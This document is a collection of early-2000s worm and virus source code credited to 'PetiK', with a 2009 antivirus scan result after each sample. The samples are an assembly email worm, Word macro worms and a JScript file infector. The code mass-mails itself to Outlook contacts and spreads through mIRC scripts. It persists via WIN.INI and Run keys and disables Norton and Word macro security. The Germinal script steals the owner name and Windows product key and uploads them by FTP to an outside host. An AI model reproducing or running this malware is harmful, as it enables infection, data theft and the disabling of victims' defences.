"I-Worm.Mustard par PetiK (c)2001",00h TITRE2 db "I-Worm.Mustard",00h TEXTE2 db " Coded By PetiK (c)2001 ",0dh,0ah db "",0dh,0ah db "Small but Pretty",0dh,0ah db "I Love You",0dh,0ah db "Since January",0dh,0ah db "I Think Of You",00h
HKEY_LOCAL_MACHINE equ 80000002h HKEY_CURRNET_USER equ 80000001h KEY_ALL_ACCESS equ 0000003Fh FILE_ATTRIBUTE_READONLY equ 00000001h FILE_ATTRIBUTE_HIDDEN equ 00000002h FILE_ATTRIBUTE_NORMAL equ 00000080h CREATE_NEW equ 00000001h CREATE_ALWAYS equ 00000002h OPEN_EXISTING equ 00000003h FILE_SHARE_READ equ 00000001h GENERIC_WRITE equ 40000000h FILE_END equ 00000002h EWX_REBOOT equ 00000002h EWX_FORCE equ 00000004h
SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends SystemTime SYSTIME <> mircd: db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= ./dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",00h MIRCTAILLE equ $-mircd sendd: db 'ENTREE()',0dh,0ah db 'Sub ENTREE',0dh,0ah db 'EMAIL()',0dh,0ah db 'End Sub',0dh,0ah db 'Sub EMAIL()',0dh,0ah db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'N.To = P.Address',0dh,0ah db 'N.Subject = "AntiVirus Update"',0dh,0ah db 'N.Body = "The last version of your AV"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah db 'N.DeleteAfterSubmit = True',0dh,0ah db 'If N.To <> "" Then',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End Sub',0dh,0ah SENDTAILLE equ $-sendd datd: db 02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h DATTAILLE equ $-datd .code DEBUT: VERIF: push offset regDisp push offset regResu push 00h push 0F003Fh push 00h push 00h ; HKCU\Software\[PetiK] exist ? push 00h push offset CLE push HKEY_CURRNET_USER call RegCreateKeyExA push [regResu] call RegCloseKey cmp [regDisp],1 jne EMAIL ; YES => EMAIL
COPIE: push 00h call GetModuleHandleA push 50 push offset szOrig push eax call GetModuleFileNameA push 50 push offset szCopie call GetWindowsDirectoryA push offset Copie push offset szCopie call lstrcat push offset szCopie push offset szOrig call CopyFileA ; Copy itself to \WINDIR\AVUpdate.exe WIN_INI:push 50 push offset szWin call GetWindowsDirectoryA push offset Winini push offset szWin call lstrcat push offset szWin ; Alters the run= line in the WIN.INI push offset szCopie push offset run push offset windows ; run=\WINDIR\AVUpdate.exe call WritePrivateProfileStringA MIRC1: push 00h push FILE_ATTRIBUTE_READONLY push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset mirc call CreateFileA mov [FileHandle],eax push 00h push offset octets push MIRCTAILLE push offset mircd push [FileHandle] call WriteFile push [FileHandle] call CloseHandle ; Create a ini script for mIRC MIRC2: push 00h push offset script1 push offset mirc call CopyFileA ; Copy to \mirc push 00h push offset script2 push offset mirc call CopyFileA ; \mirc32 push 00h push offset script3 push offset mirc call CopyFileA ; \Program Files\mirc push 00h push offset script4 push offset mirc call CopyFileA ; \Program Files\mirc32 push offset mirc call DeleteFileA ; and delete the first file
DEL_REG:push offset RegHandle push KEY_ALL_ACCESS push 00h push offset CLE_RUN push HKEY_LOCAL_MACHINE call RegOpenKeyExA
VAL1: push offset NAV ; Try to delete "Norton Auto-Protect" value push [RegHandle] call RegDeleteValueA test eax,eax jnz EMAIL ; NO => jmp EMAIL push [RegHandle] call RegCloseKey NORTON: push offset RegHandle push 001F0000h push 00h push offset CLE_NOR push HKEY_LOCAL_MACHINE call RegOpenKeyExA test eax,eax jnz FIN push offset BufferSize push offset Buffer push offset ValueType push 00h ; Search the "InstallDir" of Norton push offset Value push RegHandle call RegQueryValueExA
push [RegHandle] call RegCloseKey
TRAFIC: push offset filedat push offset Buffer call lstrcat push offset Buffer call GetFileAttributesA cmp eax,FILE_ATTRIBUTE_READONLY ; Attribute read only for the file ? je FIN ; YES => FIN push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset Buffer call CreateFileA cmp eax,-1 je REBOOT ; File exist ? NO => jmp REBOOT mov [FileHandle],eax push FILE_END push 00h push [Dist] push [FileHandle] call SetFilePointer ; End of the file push 00h push offset octets push DATTAILLE push offset datd push [FileHandle] call WriteFile ; Write datas push [FileHandle] call CloseHandle
push 5000 call Sleep ; Wait 5 seconds push FILE_ATTRIBUTE_READONLY push offset Buffer call SetFileAttributesA ; Attribute read only for the file
MESSAGE:push 40h push offset TITRE push offset TEXTE push 00h call MessageBoxA
REBOOT: push EWX_REBOOT or EWX_FORCE call ExitWindowsEx
EMAIL: push 00h push FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset VBS ; success ? continue call CreateFileA cmp eax,-1 je DATE ; else, jump to label BDR mov [FileHandle],eax push 00h push offset octets push SENDTAILLE push offset sendd push [FileHandle] call WriteFile push [FileHandle] call CloseHandle ENVOIE: push 01h push offset email call WinExec
ATTEND: push 10000 call Sleep
EFFACE: push offset VBS call DeleteFileA
DATE: push offset SystemTime call GetSystemTime cmp [SystemTime.wDay],11h jne FIN cmp [SystemTime.wDay],06h jne FIN push 40h push offset TITRE2 push offset TEXTE2 push 00h call MessageBoxA
FIN: push 00h call ExitProcess end DEBUT File Mustard.exe received on 05.16.2009 17:59:52 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK AhnLab-V3 5.0.0.2 2009.05.16 - AntiVir 7.9.0.168 2009.05.15 Worm/Petik.18 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.16 W32/Malware!989a Avast 4.8.1335.0 2009.05.15 Win32:Petik-Mustard AVG 8.5.0.336 2009.05.15 I-Worm/Petik.U BitDefender 7.2 2009.05.16 Win32.Mustar.A@mm CAT-QuickHeal 10.00 2009.05.15 W32.Petik.D ClamAV 0.94.1 2009.05.16 Worm.Petik.d Comodo 1157 2009.05.08 Worm.Win32.Petik.D DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.7168 eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.7168.A F-Prot 4.4.4.56 2009.05.16 W32/Malware!989a F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 W32/PetTick.U@mm GData 19 2009.05.16 Win32.Mustar.A@mm Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 W32/PetTick@MM McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.18 Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.D@mm NOD32 4080 2009.05.15 Win32/Petik.D Norman 6.01.05 2009.05.16 W32/Pet_Tick.7168 nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.16 W32/Petik.D PCTools 4.4.2.0 2009.05.16 Worm.Petik Prevx 3.0 2009.05.16 Medium Risk Malware Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.y Sophos 4.41.0 2009.05.16 W32/Petik-D Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.U VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192 ViRobot 2009.5.15.1737 2009.05.15 - Additional information File size: 7168 bytes MD5...: 2aae09e21d35fd56f7aa0f603dcb6151 SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d <-- Name : HTML.Embargo Author : PetiK Language : HTML/VBS
' Copy it self into %WINDIR%\WinHelp.htm ' Modify AUTOEXEC.BAT to display a message ' Modify Start Page of Internet Explorer with the WinHelp.htm file ' Forces FullScreen to Internet Explorer ' Spread with MIRC ' Infects all HTM and HTML file into %WINDIR%\Web\Wallpaper ' If day is 5th or 17th it runs "cdplayer.exe", "notepad.exe", etc... -->
File Embargo.htm received on 05.16.2009 11:30:48 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 VBS.Embargo!IK AhnLab-V3 5.0.0.2 2009.05.15 HTML/Petik AntiVir 7.9.0.168 2009.05.15 Worm/Petik.J Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik Authentium 5.1.2.4 2009.05.15 VBS/Embargo.A Avast 4.8.1335.0 2009.05.15 BV:KillAll AVG 8.5.0.336 2009.05.15 VBS/Bother BitDefender 7.2 2009.05.16 VBS.Embargo.A CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.J ClamAV 0.94.1 2009.05.15 - Comodo 1157 2009.05.08 Unclassified Malware DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.262 eSafe 7.0.17.0 2009.05.14 Email-Win32.Petik.j eTrust-Vet 31.6.6508 2009.05.16 VBS/Both F-Prot 4.4.4.56 2009.05.15 VBS/Embargo.A F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.j Fortinet 3.117.0.0 2009.05.16 VBS/Petik.J!worm GData 19 2009.05.16 VBS.Embargo.A Ikarus T3.1.1.49.0 2009.05.16 VBS.Embargo K7AntiVirus 7.10.735 2009.05.14 - Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.j McAfee 5616 2009.05.15 VBS/Ergo.intd McAfee+Artemis 5616 2009.05.15 VBS/Ergo.intd McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.J Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.J NOD32 4080 2009.05.15 VBS/Petik.J Norman 6.01.05 2009.05.16 mIRC/Gen_HTM nProtect 2009.1.8.0 2009.05.16 VBS.Embargo.A Panda 10.0.0.14 2009.05.15 HTML/Embargo PCTools 4.4.2.0 2009.05.15 VBS.Embargo.A Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 VBS.Petik.j Sophos 4.41.0 2009.05.16 VBS/Ergo-A Sunbelt 3.2.1858.2 2009.05.16 - Symantec 1.4.4.12 2009.05.16 VBS.Embaro.A.Intd TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 - VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.j ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.15 VBS.Embargo.A Additional information File size: 4085 bytes MD5...: 4ec0004fb7f700df736ae4d3c2c22919 SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667 ' Worm Name : W97M.Maya.A ' Author : PetiK ' Language : VBA Word ' Date : May 29th – June 1st 2001 ' Size : 33792 – 33280 (with change) bytes ' ' ' ' Change the properties of the documents. If not exist the Value “W97M.Maya” in ' the key HKLM\Software\, the worm copy itself to C:\Windows\Maya.doc. It creates ' the “C:\Maya” directory with a TXT file and a acript file to infect mIRC ' channel. After, it spreads with Microsoft Outlook. ' Subject : “Hi man, it’s ” + user name ' Body : “This is the new net Story” ' “It ‘s great” ' Attachment : Maya.doc ' On 5th of the month, when the document is close, a message box appears. ' When Visual Basic is active, an other message box appears and the worm ' add a value in the “RunKey” of regedit to disabled the mouse.
Sub AutoOpen() On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo) .Author = "PetiK" .Title = "W97M.Maya" .Comments = "To my best GirlFriend" .Keywords = "Maya, Bzzbzz, to grow" .Execute End With
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") <> "Par PetiK" Then
ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc" ActiveDocument.Saved = True
FileSystem.MkDir "C:\Maya" Open "C:\Maya\hello.txt" For Output As #1 Print #1, "Le 29 mai 2001 à Munster" Print #1, "This is my first W97M.Outlook.Worm" Print #1, "Its name is W97M.Maya" Close #1 Open "C:\Maya\script.ini" For Output As #1 Print #1, "n0=on 1:JOIN:#:{" Print #1, "n1= /if ( $nick == $me ) { halt }" Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc" Print #1, "n3=}" Close #1 FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini" FileSystem.Kill "C:\Maya\script.ini"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") = "Par PetiK" End If
Dim maya, bzzbzz, petik Set maya = CreateObject("Outlook.Application") Set bzzbzz = maya.GetNameSpace("MAPI") If maya = "Outlook" Then bzzbzz.Logon "profile", "password" For mayacompte = 1 To bzzbzz.AddressLists.Count Set AB = bzzbzz.AddressLists(mayacompte) x = 1 Set petik = maya.CreateItem(0) For compte = 1 To AB.AddressEntries.Count verif = AB.AddressEntries(x) petik.Recipients.Add verif x = x + 1 If x > 500 Then compte = AB.AddressEntries.Count Next compte petik.Subject = "Hi man, it's " & Application.UserName petik.Body = "This is the new net Story" + vbCrLf + "It's great" petik.Attachments.Add ActiveDocument.FullName petik.DeleteAfterSubmit = True petik.Send verif = "" Next mayacompte bzzbzz.Logoff End If
End Sub
Sub AutoClose() If Day(Now) = 5 Then MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya" End If End Sub
Sub ViewVBCode() System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") = "rundll32 mouse,disable" MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas there", vbCritical, "W97M.Maya" ShowVisualBasicEditor = True End Sub File Maya.doc received on 05.16.2009 17:59:46 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Melissa-based!IK AhnLab-V3 5.0.0.2 2009.05.16 W97M/Unnamed AntiVir 7.9.0.168 2009.05.15 W2000M/Ayam.A@mm Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord Authentium 5.1.2.4 2009.05.16 W97M/Ayam.A@mm Avast 4.8.1335.0 2009.05.15 MW97:Ayam family AVG 8.5.0.336 2009.05.15 BAT/Generic BitDefender 7.2 2009.05.16 W97M.Ayam.A@mm CAT-QuickHeal 10.00 2009.05.15 W97M.Prilissa ClamAV 0.94.1 2009.05.16 W97M.Ayam.A Comodo 1157 2009.05.08 Virus.MSWord.Melissabased DrWeb 5.0.0.12182 2009.05.16 X97M.Papa eSafe 7.0.17.0 2009.05.14 O97M.GNsm eTrust-Vet 31.6.6508 2009.05.16 W97M/Ayam.A:mm F-Prot 4.4.4.56 2009.05.16 W97M/Ayam.A@mm F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Melissa-based Fortinet 3.117.0.0 2009.05.16 W97M/Ayam.A@MM GData 19 2009.05.16 W97M.Ayam.A@mm Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Melissa-based K7AntiVirus 7.10.737 2009.05.16 Macro.Melissa-based Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Melissa-based McAfee 5616 2009.05.15 W97M/Generic@MM McAfee+Artemis 5616 2009.05.15 W97M/Generic@MM McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Ayam.A Microsoft 1.4602 2009.05.16 Virus:W97M/Ayam.A@mm NOD32 4080 2009.05.15 W97M/Ayam.A Norman 6.01.05 2009.05.16 W97M/Ayam.A nProtect 2009.1.8.0 2009.05.16 W97M.Ayam.A@mm Panda 10.0.0.14 2009.05.16 W97M/Maya.Worm PCTools 4.4.2.0 2009.05.16 WORD.97.Maya.B Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Macro.Office.Melissa-based.aa Sophos 4.41.0 2009.05.16 WM97/Munster-A Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Melissa-based (v) Symantec 1.4.4.12 2009.05.16 W97M.OutlookWorm.Gen TheHacker 6.3.4.1.326 2009.05.15 W2KM/Sin TrendMicro 8.950.0.1092 2009.05.15 W97M_AYAM.A VBA32 3.12.10.5 2009.05.16 Virus.X97M.Papa ViRobot 2009.5.15.1737 2009.05.15 W97M.Ayam.A VirusBuster 4.6.5.0 2009.05.16 WORD.97.Maya.B Additional information File size: 33280 bytes MD5...: ebe499343061e49ea4f31639fc3a7e59 SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05 // Name : JS.Germinal.A@mm // Author : PetiK // Date : June 1st – 2nd 2001 // Language : JScript // Size of infection : 2357 bytes // Action : It infects all *.JS file in \WINDOWS, \WINDOWS\DESKTOP // and \WINDOWS\SAMPLES\WSH folders. // It creates a TXT file with information and send this to a ftp server.
// JS.Germinal.A@mm var WS=WScript.CreateObject("WScript.Shell") var fso=WScript.CreateObject("Scripting.FileSystemObject") var win=fso.GetSpecialFolder(0) var c=fso.OpenTextFile(WScript.ScriptFullName,1) var virus=c.ReadAll() var dossier=new Array() dossier[0]=fso.GetFolder(".") dossier[1]=win dossier[2]=win + "\\Desktop" dossier[3]=win + "\\SAMPLES\\WSH" for(i=0;i<4;i++){ infecte(dossier[i]) } function infecte(dossier) { var notredossier=fso.GetFolder(dossier) var fichier=new Enumerator(notredossier.Files) if(fso.GetExtensionName(fichier.item()).toUpperCase()=="JS") { var victime=fso.OpenTextFile(fichier.item().path,1) var marque=victime.Read(19) var victimecode=marque+victime.ReadAll() victime.Close() if(marque!="// JS.Germinal.A@mm") { var victime=fso.CreateTextFile(fichier.item().path,2) victime.Write(virus+victimecode) victime.Close() } } }
WS.RegWrite ("HKLM\\Software\\","JS.Germinal Par PetiK 02/05/2001"); WS.RegWrite ("HKCU\\Software\\","JS.Germinal Par PetiK 02/05/2001"); var nom=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner") var org=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization") var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId") var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey") var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version") var vernum=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber") var txt=fso.CreateTextFile("C:\\"+nom+".txt",2) txt.WriteLine ("Information de " + nom + " à " + org); txt.WriteLine (""); txt.WriteLine ("Numéro d'identification : " + id); txt.WriteLine ("Numéro de la clé : " + key); txt.WriteLine ("Version de windows : " + ver + " " + vernum); txt.Close() var drv=fso.CreateTextFile(win+"\\PetiK.drv",2) drv.WriteLine ("open"); drv.WriteLine ("members.aol.com"); drv.WriteLine ("pentasm99"); drv.WriteLine ("ascii") drv.WriteLine ("put C:\\"+nom+".txt"); drv.WriteLine ("bye"); drv.WriteLine ("exit"); drv.Close() WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv")
// Par PetiK 2nd June 2001 File Germinal.js received on 05.16.2009 11:58:21 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Virus.JS.Germinal!IK AhnLab-V3 5.0.0.2 2009.05.15 JS/Germinal AntiVir 7.9.0.168 2009.05.15 JSC/Germinal.1 Antiy-AVL 2.0.3.1 2009.05.15 Virus/JS.JS Authentium 5.1.2.4 2009.05.15 JS/Germinal.A Avast 4.8.1335.0 2009.05.15 Unix:Malware-gen AVG 8.5.0.336 2009.05.15 - BitDefender 7.2 2009.05.16 JS.Germinal.A CAT-QuickHeal 10.00 2009.05.15 JS_/Germinal ClamAV 0.94.1 2009.05.15 JS.Germinal Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 JS.Optiz eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 JS/Germin F-Prot 4.4.4.56 2009.05.15 JS/Germinal.A F-Secure 8.0.14470.0 2009.05.15 Virus.JS.Germinal Fortinet 3.117.0.0 2009.05.16 JS/GERMINAL.A GData 19 2009.05.16 JS.Germinal.A Ikarus T3.1.1.49.0 2009.05.16 Virus.JS.Germinal K7AntiVirus 7.10.735 2009.05.14 - Kaspersky 7.0.0.125 2009.05.16 Virus.JS.Germinal McAfee 5616 2009.05.15 JS/Germinal McAfee+Artemis 5616 2009.05.15 JS/Germinal McAfee-GW-Edition 6.7.6 2009.05.15 Script.Germinal.1 Microsoft 1.4602 2009.05.16 Trojan:JS/Germinal.A NOD32 4080 2009.05.15 JS/Germinal.A Norman 6.01.05 2009.05.16 JS/Germinal.B nProtect 2009.1.8.0 2009.05.16 JS.Germinal.A Panda 10.0.0.14 2009.05.16 - PCTools 4.4.2.0 2009.05.15 JS.Germinal.A Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Script.Germinal.Trojan Sophos 4.41.0 2009.05.16 JS/Germinal Sunbelt 3.2.1858.2 2009.05.16 Virus.JS.Germinal (v) Symantec 1.4.4.12 2009.05.16 JS.Lamnireg.A.Trojan TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 JS_GERMINAL.A VBA32 3.12.10.5 2009.05.16 Virus.JS.Germinal ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.15 JS.Germinal.A Additional information File size: 2357 bytes MD5...: b90254895d6169a8d111a508e2638c51 SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e ' Name : W97M.Kodak ' Author : PetiK ' Date : June 5th 2001 ' Size 3,030 bytes ' ' Macro AutoOpen : Create a “script.ini” file for mIRC. If the day is the 5th ' the virus display a Baloon Message. It copies itself to /Windows/Kodak.doc. ' ' Macro AutoClose : It alters the security in Word 9.0 and 10.0 (2000 and XP) ' It copies his code into the file “Kodak.vxd” and put it in the “NORMAL.DOT”. ' When a new file is create, the code of the macro is writes in this file. ' To avoid infect two times “NORMAL.DOT”, the virus adds the value : ' HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = CliClac ' ' Macro HelpAbout : Display an other Baloon Message ' ' Macro ViewVBCode : Display a Message Box and shoxs Visual Basic Editor ' ' Macro ToolsOptions and Security : Find yourself.
'W97M.Kodak by PetiK 05/10/2001 Sub AutoOpen() On Error Resume Next ActiveDocument.SaveAs FileName:="C:\Windows\Kodak.doc" ActiveDocument.Saved = True Open "C:\script.drv" For Output As #1 Print #1, "n0=on 1:JOIN:#:{" Print #1, "n1= /if ( $nick == $me ) { halt }" Print #1, "n2= /.dcc send $nick C:\Windows\Kodak.doc" Print #1, "n3=}" Close #1 FileSystem.FileCopy "C:\script.drv", "C:\mirc\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\mirc32\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc32\script.ini" FileSystem.Kill "C:\script.drv" If Day(Now) = 5 Then With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "I am always here. And you, are you here." .Heading = "W97M.Kodak" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With End If End Sub
Sub AutoClose() If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End If If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& End If If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then Open "C:\Kodak.vxd" For Output As #1 For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Print #1, K Next i Close #1 SetAttr "C:\Kodak.vxd", vbReadOnly End If If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") <> "ClicClac" Then NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd" NormalTemplate.Save System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") = "ClicClac" End If ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd" ActiveDocument.Save End Sub
Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "Smile and cheese for the photo" .Heading = "W97M.Kodak" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With End Sub
Sub ViewVBCode() MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak" ShowVisualBasicEditor = True End Sub
Sub ToolsOptions() On Error Resume Next Options.VirusProtection = 1 Options.SaveNormalPrompt = 1 Dialogs(wdDialogToolsOptions).Show Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 End Sub
Sub ToolsSecurity() On Error Resume Next CommandBars("Macro").Controls("Security...").Enabled = True Dialogs(wdDialogToolsSecurity).Show CommandBars("Macro").Controls("Security...").Enabled = False End Sub File Kodak.doc received on 05.16.2009 17:43:05 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Adok!IK AhnLab-V3 5.0.0.2 2009.05.16 W97M/Adok AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord Authentium 5.1.2.4 2009.05.16 W97M/Adok.A Avast 4.8.1335.0 2009.05.15 MW97:Adok-A AVG 8.5.0.336 2009.05.15 W97M/Ethan BitDefender 7.2 2009.05.16 W97M.Kdk.A CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M ClamAV 0.94.1 2009.05.16 WM.Psycho Comodo 1157 2009.05.08 Virus.MSWord.Adok DrWeb 5.0.0.12182 2009.05.16 W97M.Petik eSafe 7.0.17.0 2009.05.14 O97M.GNcc eTrust-Vet 31.6.6508 2009.05.16 W97M/Adok.A F-Prot 4.4.4.56 2009.05.16 W97M/Adok.A F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Adok Fortinet 3.117.0.0 2009.05.16 W97M/Adok.A GData 19 2009.05.16 W97M.Kdk.A Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Adok K7AntiVirus 7.10.737 2009.05.16 Macro.Adok Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Adok McAfee 5616 2009.05.15 W97M/Generic McAfee+Artemis 5616 2009.05.15 W97M/Generic McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A Microsoft 1.4602 2009.05.16 Virus:W97M/Adok.A NOD32 4080 2009.05.15 W97M/Adok.A Norman 6.01.05 2009.05.16 W97M/Adok.A nProtect 2009.1.8.0 2009.05.16 W97M.Kdk.A Panda 10.0.0.14 2009.05.16 W97M/Kodak.worm PCTools 4.4.2.0 2009.05.16 WORD.97.Adok.A Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Macro.Word97.Adok Sophos 4.41.0 2009.05.16 WM97/Adok-A Sunbelt 3.2.1858.2 2009.05.16 W97M.Adok (v) Symantec 1.4.4.12 2009.05.16 W97M.Adok.A TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico TrendMicro 8.950.0.1092 2009.05.15 W97M_ABOTUS.A VBA32 3.12.10.5 2009.05.16 Virus.W97M.Ethan ViRobot 2009.5.15.1737 2009.05.15 W97M.Adok VirusBuster 4.6.5.0 2009.05.16 WORD.97.Adok.A Additional 